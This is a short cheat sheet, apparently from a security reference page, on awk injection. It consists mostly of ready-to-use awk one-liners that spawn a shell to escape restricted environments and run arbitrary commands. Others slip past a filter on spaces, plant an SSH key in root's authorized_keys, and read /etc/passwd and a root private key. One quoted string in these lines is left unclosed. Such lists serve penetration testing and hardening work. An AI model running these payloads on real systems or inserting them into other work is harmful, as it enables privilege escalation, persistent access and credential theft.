Awk injection is no different than other command injection vulnerabilities, including SQL injection. Awk is an incredibly powerful (yet simple) tool, so the possibilities are endless. See this report for an example.
It can be used to break out from restricted environments by spawning an interactive system shell.
Can be used to execute arbitrary commands on a system and spawn shells.
awk 'BEGIN{system("/bin/sh")}'It can be used to break out from the intended program by running non-interactive system commands.
Can be used to execute arbitrary commands on a system.
awk 'BEGIN {system("ls"); exit}' /dev/nullThe file must exist and command will be executed as many rows there are in the file.
awk 'system("ls")' /etc/passwdIf spaces cannot be inserted, we can use sprintf(%c,32) to emulate them.
awk '//{}BEGIN{system(sprintf("uname%c-aa",32))}'It writes data to files, it may be used to do privileged writes or write files outside a restricted file system.
Write to an arbitrary file
awk 'BEGIN{print "ssh-rsa ..." > "/root/.ssh/authorized_keys}' /dev/nullIt reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
Read an arbitrary file.
awk 'BEGIN{while((getline line<"/etc/passwd")>0){print line}}' /dev/nullPrint the contents of multiple files.
awk '//' /etc/passwd /etc/hostname /root/.ssh/id_rsa